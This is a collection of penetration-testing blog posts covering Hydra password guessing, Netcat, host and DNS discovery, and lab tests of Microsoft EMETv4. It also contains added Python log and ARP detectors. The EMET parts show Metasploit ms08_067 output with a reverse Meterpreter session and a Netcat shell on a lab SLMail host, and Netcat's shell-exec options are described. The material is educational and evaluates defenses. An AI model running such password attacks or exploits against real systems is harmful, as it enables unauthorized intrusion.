The options 'Show attempts' and 'Be verbose' are useful to better understand what the program does. Go to the Password tab and insert the user and password lists; don't forget to check 'try login as password' and 'try empty password'. For a basic test don't use the Tuning and Specific tabs; move to the Start tab and run the attack. It takes a while, but I hope you find some user and password association.
You can also try to extend your lists to have more chances, but remember that such an attack may take a very long time. In a pen test you must have a very strong reason to spend 8 or more hours on a wordlist attack.
Anyway, if you find some associations, write them down and be ready to reuse them: users tend to use the same password for more than one service.
You can start to write a file with user:password lines and use it in Hydra's Password tab instead of the user and password lists. When you discover a new service, you can first use Hydra with the new file and then with the lists of users and passwords. This will speed up your work.
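
Both the scans of the previous section and the Hydra attack described here look the same from the target's logs: one source address producing many events in a short time, either across many destination ports (a scan) or as repeated authentication failures against one service (an online password attack). The Python below is an added example (not from the post, nor a fail2ban or IDS rule) that applies one sliding-window counter to both cases; the firewall DROP, sshd and vsftpd lines are constructed in a simplified layout with plain integer timestamps, and the thresholds are this example's own choices.

```python
"""Detect port scans and online password guessing from target-side logs.

Added example (not from the original post). One sliding-window counter
serves both cases:
  - port scan: one source hits many distinct destination ports in a window
  - password attack: one source fails authentication many times in a window
The log lines are constructed in a simplified layout (integer timestamp,
then a firewall DROP record, an sshd failure or a vsftpd failure); the
thresholds are this example's choices, not a product's defaults.
"""
import re
from collections import defaultdict

FIREWALL_RE = re.compile(
    r"^(?P<t>\d+) DROP SRC=(?P<src>\S+) DST=\S+ PROTO=\S+ DPT=(?P<dpt>\d+)")
SSH_FAIL_RE = re.compile(
    r"^(?P<t>\d+) sshd.*Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)")
FTP_FAIL_RE = re.compile(
    r'^(?P<t>\d+) vsftpd.*FAIL LOGIN: Client "(?P<src>[^"]+)"')

# Constructed sample: a scanner at .140, a Hydra run from .141, background noise.
SAMPLE_LOG = """\
1000 DROP SRC=192.168.34.140 DST=192.168.34.135 PROTO=TCP DPT=21
1001 DROP SRC=192.168.34.140 DST=192.168.34.135 PROTO=TCP DPT=22
1002 DROP SRC=192.168.34.140 DST=192.168.34.135 PROTO=TCP DPT=23
1003 DROP SRC=192.168.34.140 DST=192.168.34.135 PROTO=TCP DPT=25
1004 DROP SRC=192.168.34.140 DST=192.168.34.135 PROTO=TCP DPT=80
1005 DROP SRC=192.168.34.140 DST=192.168.34.135 PROTO=TCP DPT=135
1006 DROP SRC=192.168.34.140 DST=192.168.34.135 PROTO=TCP DPT=139
1007 DROP SRC=192.168.34.140 DST=192.168.34.135 PROTO=TCP DPT=443
1008 DROP SRC=192.168.34.140 DST=192.168.34.135 PROTO=TCP DPT=445
1009 DROP SRC=192.168.34.140 DST=192.168.34.135 PROTO=TCP DPT=1433
1010 DROP SRC=192.168.34.140 DST=192.168.34.135 PROTO=TCP DPT=3306
1011 DROP SRC=192.168.34.140 DST=192.168.34.135 PROTO=TCP DPT=3389
2000 sshd[1201]: Failed password for invalid user admin from 192.168.34.141 port 51002 ssh2
2003 sshd[1202]: Failed password for root from 192.168.34.141 port 51003 ssh2
2006 sshd[1203]: Failed password for invalid user albert from 192.168.34.141 port 51004 ssh2
2009 sshd[1204]: Failed password for root from 192.168.34.141 port 51005 ssh2
2012 vsftpd: [pid 3001] [albert] FAIL LOGIN: Client "192.168.34.141"
2015 vsftpd: [pid 3002] [jodie] FAIL LOGIN: Client "192.168.34.141"
3000 DROP SRC=10.0.7.9 DST=192.168.34.135 PROTO=UDP DPT=137
3100 sshd[1300]: Failed password for jodie from 10.0.7.20 port 40001 ssh2
5000 sshd[1301]: Failed password for jodie from 10.0.7.20 port 40002 ssh2
"""


def parse_log(text):
    """Return (t, kind, src, detail) tuples sorted by time; kind is 'drop'
    (detail = destination port) or 'authfail' (detail = user or '-')."""
    events = []
    for line in text.splitlines():
        m = FIREWALL_RE.match(line)
        if m:
            events.append((int(m["t"]), "drop", m["src"], int(m["dpt"])))
            continue
        m = SSH_FAIL_RE.match(line) or FTP_FAIL_RE.match(line)
        if m:
            events.append((int(m["t"]), "authfail", m["src"], m.groupdict().get("user", "-")))
    return sorted(events)


def max_distinct_in_window(pairs, window):
    """pairs: (t, value) sorted by t. Largest number of distinct values whose
    timestamps lie within `window` seconds of each other (two-pointer sweep)."""
    best, start, counts = 0, 0, defaultdict(int)
    for t, value in pairs:
        counts[value] += 1
        while pairs[start][0] < t - window:
            old = pairs[start][1]
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            start += 1
        best = max(best, len(counts))
    return best


def detect(text, window=60, scan_ports=10, fail_limit=5):
    """Return [(source, alert)] for every source crossing either threshold."""
    by_src = defaultdict(lambda: {"drop": [], "authfail": []})
    for seq, (t, kind, src, detail) in enumerate(parse_log(text)):
        # distinct ports matter for a scan; every failure counts for guessing
        by_src[src][kind].append((t, detail if kind == "drop" else seq))
    alerts = []
    for src, ev in sorted(by_src.items()):
        if max_distinct_in_window(ev["drop"], window) >= scan_ports:
            alerts.append((src, "port scan"))
        if max_distinct_in_window(ev["authfail"], window) >= fail_limit:
            alerts.append((src, "online password attack"))
    return alerts


if __name__ == "__main__":
    for src, alert in detect(SAMPLE_LOG):
        print(f"{src}: {alert}")
```

The two mistyped logins from 10.0.7.20 are forty minutes apart and never reach the threshold, which is the point of the window: the text's own reminder that an online attack "makes network traffic and stresses systems" is exactly what makes it visible, while the -t task count in Hydra only changes how fast the counter fills.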

I hope you now have the user/password to access FTP, SMB or, if you are lucky, SSH or RDP.
This is not the end of the test, this is the beginning. You will use this access to gain more information and to find more vulnerabilities all over the LAN.
But what if you can't find anything? Don't worry, these are just the first arrows in your quiver. After these, you can try many other things such as web vectors, exploiting some vulnerability, or ARP poisoning. There are so many options that the only limit is you, and every discovery is the start of the next one.

So when you open a new port, restart from the beginning: restart from sharpening your axe.

Penetration Test – Gathering Phase. [Part 1]
https://www.gosecure.it/blog/art/210/sec/penetration-test-ghatering-phase-part-1/
Tue, 23 Jul 2013 13:17:57 +0000

This is a part of my article “Sharpen your axe with BackTrack – Gathering phase” published on PenTest Magazine and Hakin9 magazine. I have the right to do up to 100 downloads of these magazines, so if you are interested you can download PenTest Extra BackTrack Compendium 03_20132 or Hakin9 starter kit 03_20131 for free using the 3 following links. The only thing you need is a free registration.
–   PenTest Extra Compendium
–   Hakin9 Starter kit.
–   PenTest OPEN 06/2013.

Sharpen your axe with BackTrack – Gathering phase [Part 1]

Abraham Lincoln said ‘Give me six hours to chop down a tree and I will spend the first four sharpening the axe’. This is really the basic concept and the starting point of every penetration test.

In a pen test you have to sharpen your axe first by gathering information. The more you obtain, the more attack surface you will have. The gathering phase isn't the most exciting one, but surely it is the one that lets you do things better and smarter. So what do you need? Let's see.
First, you need an adequate system with the right toolkit and a little knowledge of how the tools work. We will use one of the latest versions of BackTrack (BT) because it is a powerful and widespread operating system, so it will be quite simple to get support or tutorials on the web: YouTube has a video for almost every BT tool.
The best way to start with BT is virtualization: you can download its virtual machine ready to be started. In addition, using virtualization you can easily set up a cheap and smart lab to perform your tests. If you already have a test network, you can also use the bootable CD.

Next you have to be calm and patient; only this way can you collect information and inspect it properly. You can make your own checklist of tests to do or copy one from the web, but, once you have your list, you have to follow it meticulously. Remember that you are sharpening.

Now you need to write down all the data you collect, so that everything is recorded and you can analyze it even when you aren't connected to the LAN you have to test. Furthermore you will use these records to make a detailed report for your customer or to roll back in case you mess something up.
I use Keepnote to keep track of all my operations and results and Zenmap (Nmap GUI) to map the net, but BT has many more powerful tools than these. Maltego, for example, is awesome.

My friend Netcat
Now let's start using the father of all tools, the famous ‘Swiss-army knife for TCP/IP’: Netcat. Essentially NC is a utility which reads and writes data across network connections, using TCP or UDP transport. Nothing more, nothing less.
So why is it so important? When a PC user without experience wants to test whether his machine can browse the Internet, he opens his browser and points it to a common address: www.google.com.
This is not the best test he could do: he only finds out whether he can browse, but what if he can't? The approach must be different. He has to start from a layer closer to the PC, not closer to the user, and investigate the causes, step by step, up to the human layer.
You are not an inexperienced person, so you start by opening a command shell and pinging your gateway. Is it responding? If not, check it. Then ping an external IP address (e.g. 8.8.8.8, the Google DNS). Is it responding? All right, you are able to get out of your network. Next you test whether your DNS is working by pinging a DNS name like www.google.com. Only if everything works fine do you open your browser and test the connection. You can still have a problem in the browser (e.g. a misconfigured proxy set in the browser) but, after all the tests you have done previously, you can rule out all the lower layers and focus on the current one.
That's why NC is so important. It allows you to start from the lowest layer; it is the equivalent of the ping command used in the example, but it has many more applications.

Well, open your Terminal window and have a look at the NC help.

root@bt:~# nc -h
[v1.10-38]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').

At the beginning you will use the options -l (set NC in listening mode), -v (verbose mode is always better) and -p (set the port NC listens on). Try this:
Open two Terminal windows on the same machine. In the first window start a service that listens on a specific port using Netcat (this is called the listener).

root@bt:~# nc -lvp 4444

If you have a look at the network connections of your BT machine using the command netstat -nat, you will find a listening socket on port 4444 (tcp 0.0.0.0:4444 LISTEN).
In the second window use NC as a client and connect to localhost on port 4444:

root@bt:~# nc 127.0.0.1 4444 -v

Hit enter and you establish a simple connection with NC, but what is this?
Essentially, it is a simple chat. If you write something in window 1, it is sent to window 2 and vice versa (see Figure 1).

Figure 1: Netcat simple chat

So NC is a program that allows you to communicate using the TCP or UDP protocols, and you can use it either as a client or as a server. TCP/UDP connections are more useful than a simple chat: you can use NC to test whether a remote port is open, to grab information about a service listening on a remote PC (the banner) and to connect to that service; you can also use it to redirect text, request an HTML page and, last but not least, remotely administer a PC.
If you have two PCs, try to use NC between them, or just continue testing on the same machine (that is the lower layer).
For example, you can try to pass text:

root@bt:~# echo 'This text will be transmitted using Netcat'| nc 127.0.0.1 4444

…and if the listener is set up as follows, you can also create a file with the text sent:

root@bt:~# nc -lvp 4444 > file.txt

You can also try the -c option for remote administration.
I suggest you dig around the Internet to find out more about Netcat's uses.
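
The netstat -nat check above is also the defender's cheapest way to catch a stray listener such as a forgotten nc -l or, worse, an nc -e shell. The Python below is an added example (not from the post) that parses Linux netstat -nat output and reports listening sockets that are not in an allow-list of expected ports; the netstat text is constructed and the allow-list is an assumption.

```python
"""List unexpected listening sockets from `netstat -nat` output.

Added example (not from the original post). The same view the text uses to
confirm the Netcat listener on 0.0.0.0:4444, compared against the ports a
host is supposed to expose, reveals listeners that should not be there.
The netstat text is constructed in the Linux `netstat -nat` layout; the
allow-list of ports is this example's assumption.
"""
import re

SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN
tcp        0      0 192.168.34.140:22       192.168.34.10:52110     ESTABLISHED
tcp6       0      0 :::80                   :::*                    LISTEN
"""

# proto, recv-q, send-q, local, foreign, optional state (UDP rows have none)
LINE_RE = re.compile(r"^(tcp6?|udp6?)\s+\d+\s+\d+\s+(\S+)\s+(\S+)\s+(\S+)?")
LOOPBACK = {"127.0.0.1", "::1"}


def split_addr(addr):
    """'0.0.0.0:22' -> ('0.0.0.0', 22); ':::80' -> ('::', 80)."""
    host, _, port = addr.rpartition(":")
    return host, int(port)


def listening_sockets(text):
    """(proto, bind_address, port) for every socket in LISTEN state."""
    result = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m and m.group(4) == "LISTEN":
            host, port = split_addr(m.group(2))
            result.append((m.group(1), host, port))
    return result


def unexpected_listeners(text, allowed_ports, loopback_ok=True):
    """Listeners whose port is not allowed. Loopback-only sockets are ignored
    by default because they are not reachable from the network."""
    unexpected = []
    for proto, host, port in listening_sockets(text):
        if loopback_ok and host in LOOPBACK:
            continue
        if port not in allowed_ports:
            unexpected.append((proto, host, port))
    return unexpected


if __name__ == "__main__":
    for proto, host, port in unexpected_listeners(SAMPLE_NETSTAT, {22, 80}):
        print(f"unexpected listener: {proto} {host}:{port}")
```

Run against real output (`netstat -nat` or `ss -lnt` in a similar layout) from a cron job, this turns the text's "look at netstat" step into a repeatable control; the established SSH session is ignored because only LISTEN rows matter here.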

Network hosts identification
As I said, finding information about the target is the basis of a successful test. What is the first thing you have to do when you reach a LAN you have to check? Find hosts to use as targets. If you can, create your own host-discovery scripts using ping and NC, or use some of the wonderful tools present in BT. In my opinion the best are Unicornscan and Nmap, but, since I will explain them shortly, let's explore some other programs with fewer possibilities that work just as well.
Start using netdiscover to find live hosts. With netdiscover -P a network scan is started on the common LAN address range (the one you are connected to) (see Figure 2).
Netdiscover can also be used on another network interface (-i) and IP range (-r). The -P option is useful for a better output. Netdiscover is a continuous scan tool: it scans the net over and over in order to find new hosts, and it could be used to implement a very simple intrusion detection system. To stop the scan you have to use [CTRL+C].
In a similar way you can use fping with the option -g to analyze a range of IPs. Note that fping uses the ICMP protocol, whereas netdiscover uses the ARP protocol to locate network hosts: this is a good double check.

Figure 2: Netdiscover at work
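
The paragraph above notes that netdiscover's continuous ARP scan could serve as a very simple intrusion detection system. The Python below is an added example (not from the post or from netdiscover) of that idea: it parses netdiscover-style output rows, compares them with a baseline of known IP/MAC pairs, and reports new hosts, hosts that have disappeared, and IPs that now answer from a different or an additional MAC, which is what ARP spoofing looks like on the wire. The baseline and the scan output are constructed.

```python
"""A minimal ARP-based host watch in the spirit of netdiscover.

Added example (not from the original post or netdiscover). A baseline of
known IP/MAC pairs is compared with the rows of a netdiscover-style scan.
New hosts, hosts that went silent and IPs answering from another (or an
additional) MAC are reported; the last case is the signature of ARP
spoofing. Baseline and scan output are constructed for the example.
"""
import re

# Constructed baseline: ip -> mac recorded on the last trusted scan.
BASELINE = {
    "192.168.34.1": "00:50:56:c0:00:08",
    "192.168.34.135": "00:0c:29:4e:0a:11",
    "192.168.34.140": "00:0c:29:aa:bb:cc",
    "192.168.34.150": "00:0c:29:00:11:22",
}

# Constructed output in the layout of netdiscover's screen (IP, MAC, Count, Len, Vendor).
SCAN_OUTPUT = """\
 Currently scanning: Finished!   |   Screen View: Unique Hosts
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.34.1    00:50:56:c0:00:08      1      60  VMware, Inc.
 192.168.34.135  00:0c:29:4e:0a:11      2     120  VMware, Inc.
 192.168.34.140  00:0c:29:aa:bb:cc      1      60  VMware, Inc.
 192.168.34.1    00:0c:29:de:ad:01      1      60  VMware, Inc.
 192.168.34.177  00:0c:29:12:34:56      1      60  VMware, Inc.
"""

ROW_RE = re.compile(
    r"^\s*(\d+\.\d+\.\d+\.\d+)\s+([0-9a-f]{2}(?::[0-9a-f]{2}){5})\s+\d+\s+\d+\s+(.*?)\s*$",
    re.IGNORECASE)


def parse_scan(text):
    """(ip, mac, vendor) for every host row; header and separator lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            rows.append((m.group(1), m.group(2).lower(), m.group(3)))
    return rows


def compare_with_baseline(scan_text, baseline):
    """Return (alert, ip, [macs]) for new, changed and missing hosts."""
    macs_by_ip = {}
    for ip, mac, _vendor in parse_scan(scan_text):
        macs_by_ip.setdefault(ip, set()).add(mac)
    alerts = []
    for ip, macs in sorted(macs_by_ip.items()):
        if ip not in baseline:
            alerts.append(("new host", ip, sorted(macs)))
        elif macs != {baseline[ip]}:
            # a second MAC for the gateway IP is the classic ARP spoofing picture
            alerts.append(("mac changed", ip, sorted(macs)))
    for ip in sorted(set(baseline) - set(macs_by_ip)):
        alerts.append(("missing host", ip, [baseline[ip]]))
    return alerts


if __name__ == "__main__":
    for alert, ip, macs in compare_with_baseline(SCAN_OUTPUT, BASELINE):
        print(f"{alert:13} {ip:16} {', '.join(macs)}")
```

In the constructed scan the gateway 192.168.34.1 answers from two MAC addresses, .177 is new and .150 is gone; fed from a periodic ARP sweep (or from netdiscover's -r range run in a loop) this gives the "very simple intrusion detection system" the text mentions, and the ICMP double check with fping can be added the same way.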

Don't forget to write down everything and keep track of it all. In particular, start to compile a list of live hosts. You can also try to give a DNS name to the hosts you find using smbscan, but you will notice that the program can only find a few, those with a NetBIOS name enabled.
Let's now try to find something more using DNS discovery. If you are in a domain, or if you are scanning for DNS names on the web, you can try to perform a DNS zone transfer and capture DNS records.
When you can perform this operation, you get other sensitive information and, maybe, hosts not previously discovered.
The DNS zone transfer is a query that synchronizes primary and secondary DNS servers, but if administrators misconfigure them, everyone can request a transfer and get all the DNS records. DNSenum is a tool that tries to make a zone transfer and capture the results. The basic operation is quite simple: you just have to set the target domain name.
Note that you can try the zone transfer both on a local domain (see Figure 3) and on an Internet domain (see Figure 4).
You have to notice that a DNS zone transfer, even when successful, does not give hackers direct access to the servers, but gives them a lot of information that can be useful to expand the attack surface. Look at Figure 4; the DNS zone transfer highlights at least 3 attack vectors: webmail, ftp, sftp.

Figure 3: DNS zone transfer on a local domain using host

Figure 4: DNSenum on a Web domain

It is therefore essential to block every attack and scan you can. ARP and ICMP scans too must be stopped in a protected LAN. Unfortunately this is not always practicable: in a Microsoft domain, for example, some administrative tools do not work with restrictive local firewall policies.
It is not easy to find a balance between security and efficiency.

You have done a good host analysis and you have a list of live IPs on the network. Now you can start identifying user accounts.

[end of part 1]

You can find other NetCat info in this post

EMETv4 – Part 2 https://www.gosecure.it/blog/art/169/sec/emetv4-part-2/ Mon, 24 Jun 2013 14:50:14 +0000

[begin of phase 2] Take a look at the [phase 1]

I continue my tests of EMETv4. This time I’ve installed EMETv4 on the same machines, HP-CLI01 and HP-SRV01 (note that .NET Framework 4 is required). The only configuration I set is the “recommended” one.

Test4
Target: Windows Server 2003 SP2 eng; Host Name: HP-SRV01; IP Address: 192.168.34.135
Vulnerability: CVE-2008-4250 (SMB)
Exploit used: ms08_067_netapi from metasploit
EMET agent: installed with recommended settings.

This is the msfconsole output of the exploit:

msf  exploit(ms08_067_netapi) > info

       Name: Microsoft Server Service Relative Path Stack Corruption
     Module: exploit/windows/smb/ms08_067_netapi
    Version: 16002
   Platform: Windows
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great

Provided by:
  hdm <hdm@metasploit.com>
  Brett Moore <brett.moore@insomniasec.com>
  staylor
  jduck <jduck@metasploit.com>

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOST    192.168.34.135   yes       The target address
  RPORT    445              yes       Set the SMB service port
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.34.132:33899
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.34.135
[*] Meterpreter session 1 opened (192.168.34.132:33899 -> 192.168.34.135:1091) at 2013-06-19 20:11:50 +0200

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session     User                          Path
 ---   ----  ----               ----  -------     ----                          ----
 0     0     [System Process]         4294967295                                
 4     0     System             x86   0           NT AUTHORITY\SYSTEM          
 268   4     smss.exe           x86   0           NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 316   268   csrss.exe          x86   0           NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\csrss.exe
 340   268   winlogon.exe       x86   0           NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe
 388   340   services.exe       x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
 400   340   lsass.exe          x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
 568   388   vmacthlp.exe       x86   0           NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 588   388   svchost.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
 760   388   svchost.exe        x86   0           NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
 816   388   svchost.exe        x86   0           NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
 872   388   svchost.exe        x86   0           NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
 888   388   svchost.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 1160  888   wmiadap.exe        x86   0           NT AUTHORITY\SYSTEM           \\?\C:\WINDOWS\system32\WBEM\WMIADAP.EXE
 1164  388   spoolsv.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\spoolsv.exe
 1200  388   msdtc.exe          x86   0           NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\msdtc.exe
 1284  388   cisvc.exe          x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\cisvc.exe
 1344  388   dfssvc.exe         x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\Dfssvc.exe
 1376  388   svchost.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 1460  388   inetinfo.exe       x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\inetsrv\inetinfo.exe
 1480  388   ismserv.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\ismserv.exe
 1500  388   ntfrs.exe          x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\ntfrs.exe
 1624  388   svchost.exe        x86   0           NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
 1664  388   SLadmin.exe        x86   0           NT AUTHORITY\SYSTEM           C:\Program Files\SLadmin\SLadmin.exe
 1788  388   SLSmtp.exe         x86   0           NT AUTHORITY\SYSTEM           C:\Program Files\SLmail\slsmtp.exe
 1848  388   vmtoolsd.exe       x86   0           NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1876  388   tcpsvcs.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\tcpsvcs.exe
 1964  388   SLMail.exe         x86   0           NT AUTHORITY\SYSTEM           C:\Program Files\SLmail\SLmail.exe
 2104  388   svchost.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 2336  388   svchost.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 2404  388   TPAutoConnSvc.exe  x86   0           NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
 2464  388   dllhost.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\dllhost.exe
 2612  388   alg.exe            x86   0           NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\alg.exe
 2644  588   wmiprvse.exe       x86   0           NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 2824  388   svchost.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 3060  588   wmiprvse.exe       x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\wbem\wmiprvse.exe
 3380  3352  explorer.exe       x86   0           HP\Administrator              C:\WINDOWS\Explorer.EXE
 3444  2404  TPAutoConnect.exe  x86   0           HP\Administrator              C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
 3488  3380  vmtoolsd.exe       x86   0           HP\Administrator              C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 3596  388   msiexec.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\msiexec.exe
 3924  888   wuauclt.exe        x86   0           HP\Administrator              C:\WINDOWS\system32\wuauclt.exe
 4016  3560  EMET_Agent.exe     x86   0           HP\Administrator              C:\Program Files\EMET 4.0\EMET_Agent.exe


meterpreter > sysinfo
Computer        : HP-SRV01
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >

The target is owned. Take a look at process number 4016: 4016  3560  EMET_Agent.exe
The EMET_Agent is running but the exploit still works.

Test 5
Target: Windows XP SP3 eng; Host Name: HP-CLI01; IP Address: 192.168.34.134
Vulnerability: CVE-2008-4250 (IE6)
Exploit used: ms10_002_aurora from metasploit
EMET agent: installed with recommended settings.

I set up the exploit exactly as in Test 2, but this time EMET works well and stops me.
When I start IE6 on the target machine and point it to the evil page, the Aurora exploit causes the crash of Internet Explorer, as wished. So I restart the target machine and retry: same result, IE6 crashes. To double check this I exclude iexplore.exe from the EMET configuration, and this time the exploit works.

This is a draw: exploit 1 – EMET 1.

Test 6
Target: Windows XP SP3 eng; Host Name: HP-CLI01; IP Address: 192.168.34.134
Vulnerability: CVE-2003-0264 (slmail55_4433)
Exploit used: my version of this well known exploit
EMET agent: installed with recommended settings.

Also in this case, with the default settings the exploit works:

root@bt:~# nc 192.168.34.134 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\SLmail\System>tasklist
tasklist

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         28 K
System                         4 Console                 0        236 K
smss.exe                     540 Console                 0        388 K
csrss.exe                    604 Console                 0      4,172 K
winlogon.exe                 628 Console                 0      5,032 K
services.exe                 672 Console                 0      3,348 K
lsass.exe                    684 Console                 0      1,532 K
vmacthlp.exe                 844 Console                 0      2,328 K
svchost.exe                  860 Console                 0      4,860 K
svchost.exe                  944 Console                 0      4,348 K
svchost.exe                 1036 Console                 0     18,140 K
svchost.exe                 1092 Console                 0      3,340 K
svchost.exe                 1224 Console                 0      4,236 K
spoolsv.exe                 1536 Console                 0      5,568 K
explorer.exe                1556 Console                 0     18,664 K
vmtoolsd.exe                1688 Console                 0     13,560 K
SLadmin.exe                 2020 Console                 0      3,076 K
SLSmtp.exe                   272 Console                 0      4,720 K
vmtoolsd.exe                 324 Console                 0     11,396 K
TPAutoConnSvc.exe            312 Console                 0      3,868 K
wscntfy.exe                 1368 Console                 0      1,964 K
alg.exe                     1816 Console                 0      3,416 K
TPAutoConnect.exe           2448 Console                 0      4,048 K
wuauclt.exe                 3200 Console                 0      5,048 K
SLMail.exe                   564 Console                 0      4,940 K
msiexec.exe                 3768 Console                 0      8,256 K
EMET_Agent.exe              3752 Console                 0     27,960 K
cmd.exe                     3988 Console                 0      2,432 K
tasklist.exe                3980 Console                 0      4,076 K
wmiprvse.exe                1628 Console                 0      5,528 K

C:\Program Files\SLmail\System>hostname
hostname
hp-cli01

C:\Program Files\SLmail\System>ipconfig | findstr Address
ipconfig | findstr Address
        IP Address. . . . . . . . . . . . : 192.168.34.134

C:\Program Files\SLmail\System>

Again, after a reboot, EMET doesn’t stop the attack, so I try to adjust some settings. If I change the profile template from “recommended” to “maximum” and reboot, EMET doesn’t allow the code to execute: DEP blocks execution from that address space. I double check it and retry my attack with the basic settings: the exploit is not stopped. Also in this case, let’s take two steps back and debug the application while EMET is blocking the execution (Image 1).

Image 1


The overflow works, writing “A” up to the overwriting of the EIP, but when it has to execute the payload it is stopped with the message “Access violation when executing 01C7A154”. That is actually the address where my payload starts to be executed.

Conclusions
I consider the EMET idea extremely useful and I think that this program, once implemented, will be able to increase system security. Nowadays the biggest problems, from my viewpoint, are:
– not all modules are present and activated (SEHOP and ASLR)
– not all installed programs are controlled by default
– in my tests, on Windows XP, I have a problem with the EMET_Agent when starting the GUI (Image 2) and when I reboot (Image 3).
– I would be happier if .NET Framework 4 were not a requirement.

Image 2

Image 3


In this situation I will never install this program on a production server, but I will surely follow it, waiting for its evolution.

EMETv4 – Part 1 https://www.gosecure.it/blog/art/132/sec/emetv4-part-1/ Thu, 20 Jun 2013 12:00:56 +0000

The theory
Microsoft has released the full edition of the free software EMETv4, the “Enhanced Mitigation Experience Toolkit”. The company puts together some technologies, such as ASLR and DEP, to mitigate the risk of system hacking, first of all “zero day” attacks. Thanks to DEP and ASLR, this will protect not only Microsoft software but all installed software. DEP (Data Execution Prevention) is a technology that maps services or applications into non-executable memory regions and blocks code execution from those areas (buffer overflow). ASLR (Address Space Layout Randomization) randomizes the addresses that the application uses. If someone bypasses the buffer overflow protection and writes a script to exploit it, the return address he has to write into the instruction pointer register (EIP or RIP) to redirect execution to the payload is different every time. This makes replicating the exploit considerably harder.
Well, this is what I understand… so there is no other option: I have to test it.

The practice
I will test 3 attacks:
– against an operating system vulnerability (SMB)
– against Microsoft software (IE6)
– against non-Microsoft software (SLMail)

Target machines:
– Windows XP SP3 eng (Host Name: HP-CLI01; IP Address: 192.168.34.134)
– Windows Server 2003 SP2 eng (Host Name: HP-Srv01; IP Address: 192.168.34.135)

Attack machine:
– Linux BackTrack 5R2 (Host Name: bt; IP Address: 192.168.34.132)

Note that both operating systems and vulnerabilities are rather old. I use these because I hope that EMET will work well on known exploits, better than with unknown ones. So let’s start phase 1: systems without EMETv4.

Test 1
